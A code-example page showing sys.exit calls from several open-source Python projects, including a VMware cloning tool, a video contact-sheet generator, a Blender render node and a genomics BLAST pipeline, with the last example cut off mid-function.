sys.exit

Here are examples of the Python API sys.exit taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
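
For orientation, a minimal Python 3 sketch of the call itself (not from any of the projects below): an integer argument becomes the process exit status, any other object is printed to stderr with an exit status of 1, and the call simply raises SystemExit, so it can be intercepted.

import sys

def main(argv):
    if not argv:
        print("usage: demo.py FILE...", file=sys.stderr)
        sys.exit(2)                      # integer argument becomes the exit status
    if argv[0] == "--boom":
        sys.exit("fatal: demo failure")  # non-integer is printed to stderr; status is 1
    print("ok")

if __name__ == "__main__":
    try:
        main(sys.argv[1:])
    except SystemExit as exc:
        # sys.exit() works by raising SystemExit, so cleanup can run before re-raising
        print("exiting with status %r" % exc.code, file=sys.stderr)
        raise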

175 Examples

Example 151

Project: ezmomi Source File: ezmomi.py
Function: clone
    def clone(self):
        """
        Command Section: clone
        Clone a VM from a template
        """
        self.config['hostname'] = self.config['hostname'].lower()
        self.config['mem'] = int(self.config['mem'] * 1024)  # convert GB to MB

        print "Cloning %s to new host %s with %sMB RAM..." % (
            self.config['template'],
            self.config['hostname'],
            self.config['mem']
        )

        # initialize a list to hold our network settings
        ip_settings = list()

        # Get network settings for each IP
        for key, ip_string in enumerate(self.config['ips']):

            # convert ip from string to the 'IPAddress' type
            ip = IPAddress(ip_string)

            # determine network this IP is in
            for network in self.config['networks']:
                if ip in IPNetwork(network):
                    self.config['networks'][network]['ip'] = ip
                    ipnet = IPNetwork(network)
                    self.config['networks'][network]['subnet_mask'] = str(
                        ipnet.netmask
                    )
                    ip_settings.append(self.config['networks'][network])

            # throw an error if we couldn't find a network for this ip
            if not any(d['ip'] == ip for d in ip_settings):
                print "I don't know what network %s is in.  You can supply " \
                      "settings for this network in config.yml." % ip_string
                sys.exit(1)

        # network to place new VM in
        self.get_obj([vim.Network], ip_settings[0]['network'])
        datacenter = self.get_obj([vim.Datacenter],
                                  ip_settings[0]['datacenter']
                                  )

        # get the folder where VMs are kept for this datacenter
        destfolder = datacenter.vmFolder

        cluster = self.get_obj([vim.ClusterComputeResource],
                               ip_settings[0]['cluster']
                               )

        resource_pool_str = self.config['resource_pool']
        # resource_pool setting in config file takes priority over the
        # default 'Resources' pool
        if resource_pool_str == 'Resources' \
                and ('resource_pool' in ip_settings[key]):
            resource_pool_str = ip_settings[key]['resource_pool']

        resource_pool = self.get_resource_pool(cluster, resource_pool_str)

        host_system = self.config['host']
        if host_system != "":
            host_system = self.get_obj([vim.HostSystem],
                                       self.config['host']
                                       )

        if self.debug:
            self.print_debug(
                "Destination cluster",
                cluster
            )
            self.print_debug(
                "Resource pool",
                resource_pool
            )

        if resource_pool is None:
            # use default resource pool of target cluster
            resource_pool = cluster.resourcePool

        datastore = None
        if 'datastore' in ip_settings[0]:
            datastore = self.get_obj(
                [vim.Datastore],
                ip_settings[0]['datastore'])
            if datastore is None:
                print "Error: Unable to find Datastore '%s'" \
                      % ip_settings[0]['datastore']
                sys.exit(1)

        template_vm = self.get_vm_failfast(
            self.config['template'],
            False,
            'Template VM'
        )

        # Relocation spec
        relospec = vim.vm.RelocateSpec()
        relospec.datastore = datastore
        if host_system:
            relospec.host = host_system

        if resource_pool:
            relospec.pool = resource_pool

        # Networking self.config for VM and guest OS
        devices = []
        adaptermaps = []

        # add existing NIC devices from template to our list of NICs
        # to be created
        try:
            for device in template_vm.config.hardware.device:

                if hasattr(device, 'addressType'):
                    # this is a VirtualEthernetCard, so we'll delete it
                    nic = vim.vm.device.VirtualDeviceSpec()
                    nic.operation = \
                        vim.vm.device.VirtualDeviceSpec.Operation.remove
                    nic.device = device
                    devices.append(nic)
        except:
            # not the most graceful handling, but unable to reproduce
            # user's issues in #57 at this time.
            pass

        # create a Network device for each static IP
        for key, ip in enumerate(ip_settings):
            # VM device
            nic = vim.vm.device.VirtualDeviceSpec()
            # or edit if a device exists
            nic.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
            nic.device = vim.vm.device.VirtualVmxnet3()
            nic.device.wakeOnLanEnabled = True
            nic.device.addressType = 'assigned'
            # 4000 seems to be the value to use for a vmxnet3 device
            nic.device.key = 4000
            nic.device.deviceInfo = vim.Description()
            nic.device.deviceInfo.label = 'Network Adapter %s' % (key + 1)
            nic.device.deviceInfo.summary = ip_settings[key]['network']
            nic.device.backing = (
                vim.vm.device.VirtualEthernetCard.NetworkBackingInfo()
            )
            nic.device.backing.network = (
                self.get_obj([vim.Network], ip_settings[key]['network'])
            )
            nic.device.backing.deviceName = ip_settings[key]['network']
            nic.device.backing.useAutoDetect = False
            nic.device.connectable = vim.vm.device.VirtualDevice.ConnectInfo()
            nic.device.connectable.startConnected = True
            nic.device.connectable.allowGuestControl = True
            devices.append(nic)

            # guest NIC settings, i.e. 'adapter map'
            guest_map = vim.vm.customization.AdapterMapping()
            guest_map.adapter = vim.vm.customization.IPSettings()
            guest_map.adapter.ip = vim.vm.customization.FixedIp()
            guest_map.adapter.ip.ipAddress = str(ip_settings[key]['ip'])
            guest_map.adapter.subnetMask = str(ip_settings[key]['subnet_mask'])

            # these may not be set for certain IPs
            try:
                guest_map.adapter.gateway = ip_settings[key]['gateway']
            except:
                pass

            try:
                guest_map.adapter.dnsDomain = self.config['domain']
            except:
                pass

            adaptermaps.append(guest_map)

        # VM config spec
        vmconf = vim.vm.ConfigSpec()
        vmconf.numCPUs = self.config['cpus']
        vmconf.memoryMB = self.config['mem']
        vmconf.cpuHotAddEnabled = True
        vmconf.memoryHotAddEnabled = True
        vmconf.deviceChange = devices

        # DNS settings
        globalip = vim.vm.customization.GlobalIPSettings()
        globalip.dnsServerList = self.config['dns_servers']
        globalip.dnsSuffixList = self.config['domain']

        # Hostname settings
        ident = vim.vm.customization.LinuxPrep()
        ident.domain = self.config['domain']
        ident.hostName = vim.vm.customization.FixedName()
        ident.hostName.name = self.config['hostname']

        customspec = vim.vm.customization.Specification()
        customspec.nicSettingMap = adaptermaps
        customspec.globalIPSettings = globalip
        customspec.identity = ident

        # Clone spec
        clonespec = vim.vm.CloneSpec()
        clonespec.location = relospec
        clonespec.config = vmconf
        clonespec.customization = customspec
        clonespec.powerOn = True
        clonespec.template = False

        self.addDisks(template_vm, clonespec)

        if self.debug:
            self.print_debug("CloneSpec", clonespec)

        # fire the clone task
        tasks = [template_vm.Clone(folder=destfolder,
                                   name=self.config['hostname'],
                                   spec=clonespec
                                   )]
        result = self.WaitForTasks(tasks)

        if self.config['post_clone_cmd']:
            try:
                # helper env variables
                os.environ['EZMOMI_CLONE_HOSTNAME'] = self.config['hostname']
                print "Running --post-clone-cmd %s" % \
                      self.config['post_clone_cmd']
                os.system(self.config['post_clone_cmd'])

            except Exception as e:
                print "Error running post-clone command. Exception: %s" % e
                pass

        # send notification email
        if self.config['mail']:
            self.send_email()
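
Both sys.exit(1) calls above abort the clone as soon as a required inventory lookup fails, before any vSphere task is fired. A condensed sketch of that fail-fast idiom (require and its arguments are hypothetical helpers, not part of ezmomi):

import sys

def require(value, message):
    """Return value, or exit with status 1 and an explanatory message."""
    if value is None:
        print(message, file=sys.stderr)
        sys.exit(1)   # non-zero status tells callers (and shells) the clone never started
    return value

# hypothetical usage mirroring the datastore lookup above:
# datastore = require(self.get_obj([vim.Datastore], name),
#                     "Error: Unable to find Datastore '%s'" % name)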

Example 152

Project: vcsi Source File: vcsi.py
Function: main
def main():
    """Program entry point
    """
    parser = argparse.ArgumentParser(description="Create a video contact sheet")
    parser.add_argument("filenames", nargs="+")
    parser.add_argument(
        "-o", "--output",
        help="save to output file",
        dest="output_path")
    parser.add_argument(
        "--start-delay-percent",
        help="do not capture frames in the first n percent of total time",
        dest="start_delay_percent",
        type=int,
        default=DEFAULT_START_DELAY_PERCENT)
    parser.add_argument(
        "--end-delay-percent",
        help="do not capture frames in the last n percent of total time",
        dest="end_delay_percent",
        type=int,
        default=DEFAULT_END_DELAY_PERCENT)
    parser.add_argument(
        "--delay-percent",
        help="do not capture frames in the first and last n percent of total time",
        dest="delay_percent",
        type=int,
        default=DEFAULT_DELAY_PERCENT)
    parser.add_argument(
        "--grid-spacing",
        help="number of pixels spacing captures both vertically and horizontally",
        dest="grid_spacing",
        type=int,
        default=DEFAULT_GRID_SPACING)
    parser.add_argument(
        "--grid-horizontal-spacing",
        help="number of pixels spacing captures horizontally",
        dest="grid_horizontal_spacing",
        type=int,
        default=DEFAULT_GRID_HORIZONTAL_SPACING)
    parser.add_argument(
        "--grid-vertical-spacing",
        help="number of pixels spacing captures vertically",
        dest="grid_vertical_spacing",
        type=int,
        default=DEFAULT_GRID_VERTICAL_SPACING)
    parser.add_argument(
        "-w", "--width",
        help="width of the generated contact sheet",
        dest="vcs_width",
        type=int,
        default=DEFAULT_CONTACT_SHEET_WIDTH)
    parser.add_argument(
        "-g", "--grid",
        help="display frames on a mxn grid (for example 4x5)",
        dest="grid",
        type=mxn_type,
        default=DEFAULT_GRID_SIZE)
    parser.add_argument(
        "-s", "--num-samples",
        help="number of samples",
        dest="num_samples",
        type=int,
        default=None)
    parser.add_argument(
        "-t", "--show-timestamp",
        action="store_true",
        help="display timestamp for each frame",
        dest="show_timestamp")
    parser.add_argument(
        "--metadata-font-size",
        help="size of the font used for metadata",
        dest="metadata_font_size",
        type=int,
        default=DEFAULT_METADATA_FONT_SIZE)
    parser.add_argument(
        "--metadata-font",
        help="TTF font used for metadata",
        dest="metadata_font",
        default=DEFAULT_METADATA_FONT)
    parser.add_argument(
        "--timestamp-font-size",
        help="size of the font used for timestamps",
        dest="timestamp_font_size",
        type=int,
        default=DEFAULT_TIMESTAMP_FONT_SIZE)
    parser.add_argument(
        "--timestamp-font",
        help="TTF font used for timestamps",
        dest="timestamp_font",
        default=DEFAULT_TIMESTAMP_FONT)
    parser.add_argument(
        "--metadata-position",
        help="Position of the metadata header. Must be one of ['top', 'bottom', 'hidden']",
        dest="metadata_position",
        type=metadata_position_type,
        default=DEFAULT_METADATA_POSITION)
    parser.add_argument(
        "--background-color",
        help="Color of the background in hexadecimal, for example AABBCC",
        dest="background_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_BACKGROUND_COLOR))
    parser.add_argument(
        "--metadata-font-color",
        help="Color of the metadata font in hexadecimal, for example AABBCC",
        dest="metadata_font_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_METADATA_FONT_COLOR))
    parser.add_argument(
        "--timestamp-font-color",
        help="Color of the timestamp font in hexadecimal, for example AABBCC",
        dest="timestamp_font_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_TIMESTAMP_FONT_COLOR))
    parser.add_argument(
        "--timestamp-background-color",
        help="Color of the timestamp background rectangle in hexadecimal, for example AABBCC",
        dest="timestamp_background_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_TIMESTAMP_BACKGROUND_COLOR))
    parser.add_argument(
        "--template",
        help="Path to metadata template file",
        dest="metadata_template_path",
        default=None)
    parser.add_argument(
        "-m", "--manual",
        help="Comma-seperated list of frame timestamps to use, for example 1:11:11.111,2:22:22.222",
        dest="manual_timestamps",
        type=manual_timestamps,
        default=None)
    parser.add_argument(
        "-v", "--verbose",
        action="store_true",
        help="display verbose messages",
        dest="is_verbose")
    parser.add_argument(
        "-a", "--accurate",
        action="store_true",
        help="""Make accurate captures. This capture mode is way slower than the default one
        but it helps when capturing frames from HEVC videos.""",
        dest="is_accurate")
    parser.add_argument(
        "-A", "--accurate-delay-seconds",
        type=int,
        default=DEFAULT_ACCURATE_DELAY_SECONDS,
        help="""Fast skip to N seconds before capture time, then do accurate capture
        (decodes N seconds of video before each capture). This is used with accurate capture mode only.""",
        dest="accurate_delay_seconds")
    parser.add_argument(
        "--metadata-margin",
        type=int,
        default=DEFAULT_METADATA_MARGIN,
        help="Margin (in pixels) in the metadata header.",
        dest="metadata_margin")
    parser.add_argument(
        "--metadata-horizontal-margin",
        type=int,
        default=DEFAULT_METADATA_HORIZONTAL_MARGIN,
        help="Horizontal margin (in pixels) in the metadata header.",
        dest="metadata_horizontal_margin")
    parser.add_argument(
        "--metadata-vertical-margin",
        type=int,
        default=DEFAULT_METADATA_VERTICAL_MARGIN,
        help="Vertical margin (in pixels) in the metadata header.",
        dest="metadata_vertical_margin")
    parser.add_argument(
        "--timestamp-horizontal-padding",
        type=int,
        default=DEFAULT_TIMESTAMP_HORIZONTAL_PADDING,
        help="Horizontal padding (in pixels) for timestamps.",
        dest="timestamp_horizontal_padding")
    parser.add_argument(
        "--timestamp-vertical-padding",
        type=int,
        default=DEFAULT_TIMESTAMP_VERTICAL_PADDING,
        help="Vertical padding (in pixels) for timestamps.",
        dest="timestamp_vertical_padding")
    parser.add_argument(
        "--timestamp-horizontal-margin",
        type=int,
        default=DEFAULT_TIMESTAMP_HORIZONTAL_MARGIN,
        help="Horizontal margin (in pixels) for timestamps.",
        dest="timestamp_horizontal_margin")
    parser.add_argument(
        "--timestamp-vertical-margin",
        type=int,
        default=DEFAULT_TIMESTAMP_VERTICAL_MARGIN,
        help="Vertical margin (in pixels) for timestamps.",
        dest="timestamp_vertical_margin")
    parser.add_argument(
        "--quality",
        type=int,
        default=DEFAULT_IMAGE_QUALITY,
        help="Output image quality. Must be an integer in the range 0-100. 100 = best quality.",
        dest="image_quality")
    parser.add_argument(
        "-f", "--format",
        type=str,
        default=DEFAULT_IMAGE_FORMAT,
        help="Output image format. Can be any format supported by pillow. For example 'png' or 'jpg'.",
        dest="image_format")
    parser.add_argument(
        "-T", "--timestamp-position",
        type=timestamp_position_type,
        default=DEFAULT_TIMESTAMP_POSITION,
        help="Timestamp position. Must be one of %s." % (VALID_TIMESTAMP_POSITIONS,),
        dest="timestamp_position")
    parser.add_argument(
        "-r", "--recursive",
        action="store_true",
        help="Process every file in the specified directory recursively.",
        dest="recursive")
    parser.add_argument(
        "--capture-alpha",
        type=int,
        default=DEFAULT_CAPTURE_ALPHA,
        help="Alpha channel value for the captures (transparency in range [0, 255]). Defaults to 255 (opaque)",
        dest="capture_alpha")
    parser.add_argument(
        "--version",
        action="version",
        version="%(prog)s version {version}".format(version=__version__))
    parser.add_argument(
        "--list-template-attributes",
        action="store_true",
        dest="list_template_attributes")

    args = parser.parse_args()

    if args.list_template_attributes:
        print_template_attributes()
        sys.exit(0)

    if args.recursive:
        for path in args.filenames:
            for root, subdirs, files in os.walk(path):
                for f in files:
                    filepath = os.path.join(root, f)
                    process_file(filepath, args)
    else:
        for path in args.filenames:
            if os.path.isdir(path):
                for filepath in os.listdir(path):
                    abs_filepath = os.path.join(path, filepath)
                    if not os.path.isdir(abs_filepath):
                        process_file(abs_filepath, args)
            else:
                process_file(path, args)
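
Note how --list-template-attributes short-circuits with sys.exit(0): informational flags exit successfully before any real work begins. A self-contained sketch of the idiom, using only argparse (the flag and its output below are made up):

import argparse
import sys

def main():
    parser = argparse.ArgumentParser(description="demo")
    parser.add_argument("--list-formats", action="store_true")
    parser.add_argument("filenames", nargs="*")
    args = parser.parse_args()

    if args.list_formats:
        print("png, jpg")  # purely informational output
        sys.exit(0)        # exit cleanly before touching any input files

    for name in args.filenames:
        print("processing", name)

if __name__ == "__main__":
    main()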

Example 153

Project: brenda Source File: node.py
def run_tasks(opts, args, conf):
    def write_done_file():
        with open("DONE", "w") as f:
            f.write(aws.get_done(opts, conf)+'\n')

    def read_done_file():
        try:
            with open('DONE') as f:
                ret = f.readline().strip()
        except:
            ret = 'exit'
        aws.validate_done(ret)
        return ret

    def task_complete_accounting(task_count):
        # update some info files if we are running in daemon mode
        # number of tasks we have completed so far
        utils.write_atomic('task_count', "%d\n" % (task_count,))

        # timestamp of completion of last task
        utils.write_atomic('task_last', "%d\n" % (time.time(),))

    def signal_handler(signal, frame):
        print "cuem*** SIGNAL %r, exiting" % (signal,)
        cleanup_all()
        sys.exit(1)

    def cleanup_all():
        tasks = (local.task_active, local.task_push)
        local.task_active = local.task_push = None
        for i, task in enumerate(tasks):
            name = task_names[i]
            cleanup(task, name)

    def cleanup(task, name):
        if task:
            if task.msg is not None:
                try:
                    msg = task.msg
                    task.msg = None
                    msg.change_visibility(0) # immediately return task back to work queue
                except Exception, e:
                    print "******* CLEANUP EXCEPTION sqs change_visibility", name, e
            if task.proc is not None:
                try:
                    proc = task.proc
                    task.proc = None
                    proc.stop()
                except Exception, e:
                    print "******* CLEANUP EXCEPTION proc stop", name, e
            if task.outdir is not None:
                try:
                    outdir = task.outdir
                    task.outdir = None
                    utils.rmtree(outdir)
                except Exception, e:
                    print "******* CLEANUP EXCEPTION rm outdir", name, task.outdir, e

    def task_loop():
        try:
            # reset tasks
            local.task_active = None
            local.task_push = None

            # get SQS work queue
            q = aws.get_sqs_queue(conf)

            # Loop over tasks.  There are up to two different tasks at any
            # given moment that we are processing concurrently:
            #
            # 1. Active task -- usually a blender render operation.
            # 2. S3 push task -- a task which pushes the products of the
            #                    previous active task (such as rendered
            #                    frames) to S3.
            while True:
                # reset active task
                local.task_active = None

                # initialize active task object
                task = State()
                task.msg = None
                task.proc = None
                task.retcode = None
                task.outdir = None
                task.id = 0

                # Get a task from the SQS work queue.  This is normally
                # a short script that runs blender to render one
                # or more frames.
                task.msg = q.read()

                # output some debug info
                print "queue read:", task.msg
                if local.task_push:
                    print "push task:", local.task_push.__dict__
                else:
                    print "no task push task"

                # process task
                if task.msg is not None:
                    # assign an ID to task
                    local.task_id_counter += 1
                    task.id = local.task_id_counter

                    # register active task
                    local.task_active = task

                    # create output directory
                    task.outdir = os.path.join(work_dir, "brenda-outdir%d.tmp" % (task.id,))
                    utils.rmtree(task.outdir)
                    utils.mkdir(task.outdir)

                    # get the task script
                    script = task.msg.get_body()
                    print "script len:", len(script)

                    # do macro substitution on the task script
                    script = script.replace('$OUTDIR', task.outdir)

                    # add shebang if absent
                    if not script.startswith("#!"):
                        script = "#!/bin/bash\n" + script

                    # cd to project directory, where we will run blender from
                    with utils.Cd(proj_dir) as cd:
                        # write script file and make it executable
                        script_fn = "./brenda-go"
                        with open(script_fn, 'w') as f:
                            f.write(script)
                        st = os.stat(script_fn)
                        os.chmod(script_fn, st.st_mode | (stat.S_IEXEC|stat.S_IXGRP|stat.S_IXOTH))

                        # run the script
                        print "------- Run script %s -------" % (os.path.realpath(script_fn),)
                        print script,
                        print "--------------------------"
                        task.proc = Subprocess([script_fn])

                    print "active task:", local.task_active.__dict__

                # Wait for active and S3-push tasks to complete,
                # while periodically reasserting with SQS to
                # acknowledge that tasks are still pending.
                # (If we don't reassert with SQS frequently enough,
                # it will assume we died, and put our tasks back
                # in the queue.  "frequently enough" means within
                # visibility_timeout.)
                count = 0
                while True:
                    reassert = (count >= visibility_timeout_reassert)
                    for i, task in enumerate((local.task_active, local.task_push)):
                        if task:
                            name = task_names[i]
                            if task.proc is not None:
                                # test if process has finished
                                task.retcode = task.proc.poll()
                                if task.retcode is not None:
                                    # process has finished
                                    task.proc = None

                                    # did process finish with errors?
                                    if task.retcode != 0:
                                        errtxt = "fatal error in %s task" % (name,)
                                        if name == 'active':
                                            raise error.ValueErrorRetry(errtxt)
                                        else:
                                            raise ValueError(errtxt)

                                    # Process finished successfully.  If S3-push process,
                                    # tell SQS that the task completed successfully.
                                    if name == 'push':
                                        print "******* TASK", task.id, "COMMITTED to S3"
                                        q.delete_message(task.msg)
                                        task.msg = None
                                        local.task_count += 1
                                        task_complete_accounting(local.task_count)

                                    # active task completed?
                                    if name == 'active':
                                        print "******* TASK", task.id, "READY-FOR-PUSH"

                            # tell SQS that we are still working on the task
                            if reassert and task.proc is not None:
                                print "******* REASSERT", name, task.id
                                task.msg.change_visibility(visibility_timeout)

                    # break out of loop only when no pending tasks remain
                    if ((not local.task_active or local.task_active.proc is None)
                        and (not local.task_push or local.task_push.proc is None)):
                        break

                    # setup for next process poll iteration
                    if reassert:
                        count = 0
                    time.sleep(1)
                    count += 1

                # clean up the S3-push task
                cleanup(local.task_push, 'push')
                local.task_push = None

                # start a concurrent push task to commit files generated by
                # just-completed active task (such as blender render frames) to S3
                if local.task_active:
                    local.task_active.proc = start_s3_push_process(opts, args, conf, local.task_active.outdir)
                    local.task_push = local.task_active
                    local.task_active = None

                # if no active task and no S3-push task, we are done (unless DONE is set to "poll")
                if not local.task_active and not local.task_push:
                    if read_done_file() == "poll":
                        print "Polling for more work..."
                        time.sleep(15)
                    else:
                        break

        finally:
            cleanup_all()

    # initialize task_active and task_push states
    task_names = ('active', 'push')
    local = State()
    local.task_active = None
    local.task_push = None
    local.task_id_counter = 0
    local.task_count = 0

    # setup signal handler
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)

    # get configuration parameters
    work_dir = aws.get_work_dir(conf)
    visibility_timeout_reassert = int(conf.get('VISIBILITY_TIMEOUT_REASSERT', '30'))
    visibility_timeout = int(conf.get('VISIBILITY_TIMEOUT', '120'))

    # validate RENDER_OUTPUT bucket
    aws.get_s3_output_bucket(conf)

    # file cleanup
    utils.rm('task_count')
    utils.rm('task_last')

    # create Blender temporary directory
    tmp_dir = os.path.join(work_dir, 'tmp')
    if not os.path.isdir(tmp_dir):
        utils.mkdir(tmp_dir)
    os.environ['TMP'] = tmp_dir

    # save the value of DONE config var
    write_done_file()

    # Get our spot instance request, if it exists
    spot_request_id = None
    if int(conf.get('RUNNING_ON_EC2', '1')):
        try:
            instance_id = aws.get_instance_id_self()
            spot_request_id = aws.get_spot_request_from_instance_id(conf, instance_id)
            print "Spot request ID:", spot_request_id
        except Exception, e:
            print "Error determining spot instance request:", e

    # get project (from s3:// or file://)
    blender_project = conf.get('BLENDER_PROJECT')
    if not blender_project:
        raise ValueError("BLENDER_PROJECT not defined in configuration")

    # directory that blender will be run from
    proj_dir = get_project(conf, blender_project)
    print "PROJ_DIR", proj_dir

    # mount additional EBS volumes
    aws.mount_additional_ebs(conf, proj_dir)

    # continue only if we are not in "dry-run" mode
    if not opts.dry_run:
        # execute the task loop
        error.retry(conf, task_loop)

        # if "DONE" file == "shutdown", do a shutdown now as we exit
        if read_done_file() == "shutdown":
            if spot_request_id:
                try:
                    # persistent spot instances must be explicitly cancelled, or
                    # EC2 will automatically requeue the spot instance request
                    print "Canceling spot instance request:", spot_request_id
                    aws.cancel_spot_request(conf, spot_request_id)
                except Exception, e:
                    print "Error canceling spot instance request:", e
            utils.shutdown()

        print "******* DONE (%d tasks completed)" % (local.task_count,)

Example 154

Project: LS-BSR Source File: ls_bsr.py
def main(directory,id,filter,processors,genes,cluster_method,blast,length,
         max_plog,min_hlog,f_plog,keep,filter_peps,filter_scaffolds,prefix,temp_dir,debug):
    start_dir = os.getcwd()
    ap=os.path.abspath("%s" % start_dir)
    dir_path=os.path.abspath("%s" % directory)
    logging.logPrint("Testing paths of dependencies")
    if blast=="blastn" or blast=="tblastn":
        ab = subprocess.call(['which', 'blastn'])
        if ab == 0:
            print "citation: Altschul SF, Madden TL, Schaffer AA, Zhang J, Zhang Z, Miller W, and Lipman DJ. 1997. Gapped BLAST and PSI-BLAST: a new generation of protein database search programs. Nucleic Acids Res 25:3389-3402"
        else:
            print "blastn isn't in your path, but needs to be!"
            sys.exit()
    if "NULL" in temp_dir:
        fastadir = tempfile.mkdtemp()
    else:
        fastadir = os.path.abspath("%s" % temp_dir)
        if os.path.exists('%s' % temp_dir):
            print "old run directory exists in your genomes directory (%s).  Delete and run again" % temp_dir
            sys.exit()
        else:
            os.makedirs('%s' % temp_dir)
    for infile in glob.glob(os.path.join(dir_path, '*.fasta')):
        name=get_seq_name(infile)
        os.link("%s" % infile, "%s/%s.new" % (fastadir,name))
    if "null" in genes:
        rc = subprocess.call(['which', 'prodigal'])
        if rc == 0:
            pass
        else:
            print "prodigal is not in your path, but needs to be!"
            sys.exit()
        print "citation: Hyatt D, Chen GL, Locascio PF, Land ML, Larimer FW, and Hauser LJ. 2010. Prodigal: prokaryotic gene recognition and translation initiation site identification. BMC Bioinformatics 11:119"
        if "usearch" in cluster_method:
            print "citation: Edgar RC. 2010. Search and clustering orders of magnitude faster than BLAST. Bioinformatics 26:2460-2461"
        elif "cd-hit" in cluster_method:
            print "citation: Li, W., Godzik, A. 2006. Cd-hit: a fast program for clustering and comparing large sets of protein or nuceltodie sequences. Bioinformatics 22(13):1658-1659"
        elif "vsearch" in cluster_method:
            print "citation: Rognes, T., Flouri, T., Nichols, B., Qunice, C., Mahe, Frederic. 2016. VSEARCH: a versatile open source tool for metagenomics. PeerJ Preprints. DOI: https://doi.org/10.7287/peerj.preprints.2409v1"
        if blast=="blat":
            ac = subprocess.call(['which', 'blat'])
            if ac == 0:
                print "citation: W.James Kent. 2002. BLAT - The BLAST-Like Alignment Tool.  Genome Research 12:656-664"
            else:
                print "You have requested blat, but it is not in your PATH"
                sys.exit()
        logging.logPrint("predicting genes with Prodigal")
        predict_genes(fastadir, processors)
        logging.logPrint("Prodigal done")
        """This function produces locus tags"""
        genbank_hits = process_genbank_files(dir_path)
        if genbank_hits == None or len(genbank_hits) == 0:
            os.system("cat *genes.seqs > all_gene_seqs.out")
            if filter_scaffolds == "T":
                filter_scaffolds("all_gene_seqs.out")
                os.system("mv tmp.out all_gene_seqs.out")
            else:
                pass
        else:
            logging.logPrint("Converting genbank files")
            """First combine all of the prodigal files into one file"""
            os.system("cat *genes.seqs > all_gene_seqs.out")
            if filter_scaffolds == "T":
                filter_scaffolds("all_gene_seqs.out")
                os.system("mv tmp.out all_gene_seqs.out")
            else:
                pass
            """This combines the locus tags with the Prodigal prediction"""
            os.system("cat *locus_tags.fasta all_gene_seqs.out > tmp.out")
            os.system("mv tmp.out all_gene_seqs.out")
            """I also need to convert the GenBank file to a FASTA file"""
            for hit in genbank_hits:
                reduced_hit = hit.replace(".gbk","")
                SeqIO.convert("%s/%s" % (dir_path, hit), "genbank", "%s.fasta.new" % reduced_hit, "fasta")
        if "NULL" in cluster_method:
            print "Clustering chosen, but no method selected...exiting"
            sys.exit()
        elif "usearch" in cluster_method:
            ac = subprocess.call(['which', 'usearch'])
            if ac == 0:
                os.system("mkdir split_files")
                os.system("cp all_gene_seqs.out split_files/all_sorted.txt")
                os.chdir("split_files/")
                logging.logPrint("Splitting FASTA file for use with USEARCH")
                split_files("all_sorted.txt")
                logging.logPrint("clustering with USEARCH at an ID of %s" % id)
                run_usearch(id)
                os.system("cat *.usearch.out > all_sorted.txt")
                os.system("mv all_sorted.txt %s" % fastadir)
                os.chdir("%s" % fastadir)
                uclust_cluster(id)
                logging.logPrint("USEARCH clustering finished")
            else:
                print "usearch must be in your path as usearch...exiting"
                sys.exit()
        elif "vsearch" in cluster_method:
            ac = subprocess.call(['which', 'vsearch'])
            if ac == 0:
                logging.logPrint("clustering with VSEARCH at an ID of %s, using %s processors" % (id,processors))
                run_vsearch(id, processors)
                os.system("mv vsearch.out consensus.fasta")
                logging.logPrint("VSEARCH clustering finished")
            else:
                print "vsearch must be in your path as vsearch...exiting"
                sys.exit()
        elif "cd-hit" in cluster_method:
            ac = subprocess.call(['which', 'cd-hit-est'])
            if ac == 0:
                logging.logPrint("clustering with cd-hit at an ID of %s, using %s processors" % (id,processors))
                subprocess.check_call("cd-hit-est -i all_gene_seqs.out -o consensus.fasta -M 0 -T %s -c %s > /dev/null 2>&1" % (processors, id), shell=True)
            else:
                print "cd-hit must be in your path as cd-hit-est...exiting"
                sys.exit()
        """need to check for dups here"""
        dup_ids = test_duplicate_header_ids("consensus.fasta")
        if dup_ids == "True":
            pass
        elif dup_ids == "False":
            print "duplicate headers identified, renaming.."
            rename_fasta_header("consensus.fasta", "tmp.txt")
            os.system("mv tmp.txt consensus.fasta")
        else:
            pass
        if "tblastn" == blast:
            subprocess.check_call("makeblastdb -in consensus.fasta -dbtype nucl > /dev/null 2>&1", shell=True)
            translate_consensus("consensus.fasta")
            if filter_peps == "T":
                filter_seqs("tmp.pep")
                os.system("rm tmp.pep")
            else:
                os.system("mv tmp.pep consensus.pep")
            clusters = get_cluster_ids("consensus.pep")
            blast_against_self_tblastn("tblastn", "consensus.fasta", "consensus.pep", "tmp_blast.out", processors, filter)
        elif "blastn" == blast:
            subprocess.check_call("makeblastdb -in consensus.fasta -dbtype nucl > /dev/null 2>&1", shell=True)
            blast_against_self_blastn("blastn", "consensus.fasta", "consensus.fasta", "tmp_blast.out", filter, processors)
            clusters = get_cluster_ids("consensus.fasta")
        elif "blat" == blast:
            blat_against_self("consensus.fasta", "consensus.fasta", "tmp_blast.out", processors)
            clusters = get_cluster_ids("consensus.fasta")
        else:
            pass
        subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
        ref_scores=parse_self_blast(open("self_blast.out", "U"))
        subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
        os.system("rm *new_genes.*")
        if blast == "tblastn" or blast == "blastn":
            logging.logPrint("starting BLAST")
        else:
            logging.logPrint("starting BLAT")
        if "tblastn" == blast:
            blast_against_each_genome_tblastn(dir_path, processors, "consensus.pep", filter)
        elif "blastn" == blast:
            blast_against_each_genome_blastn(dir_path, processors, filter, "consensus.fasta")
        elif "blat" == blast:
            blat_against_each_genome(dir_path, "consensus.fasta",processors)
        else:
            pass
    else:
        logging.logPrint("Using pre-compiled set of predicted genes")
        files = glob.glob(os.path.join(dir_path, "*.fasta"))
        if len(files)==0:
            print "no usable reference genomes found!"
            sys.exit()
        else:
            pass
        gene_path=os.path.abspath("%s" % genes)
        dup_ids = test_duplicate_header_ids(gene_path)
        if dup_ids == "True":
            pass
        elif dup_ids == "False":
            print "duplicate headers identified, exiting.."
            sys.exit()
        clusters = get_cluster_ids(gene_path)
        os.system("cp %s %s" % (gene_path,fastadir))
        os.chdir("%s" % fastadir)
        if gene_path.endswith(".pep"):
            logging.logPrint("using tblastn on peptides")
            try:
                subprocess.check_call("makeblastdb -in %s -dbtype prot > /dev/null 2>&1" % gene_path, shell=True)
            except:
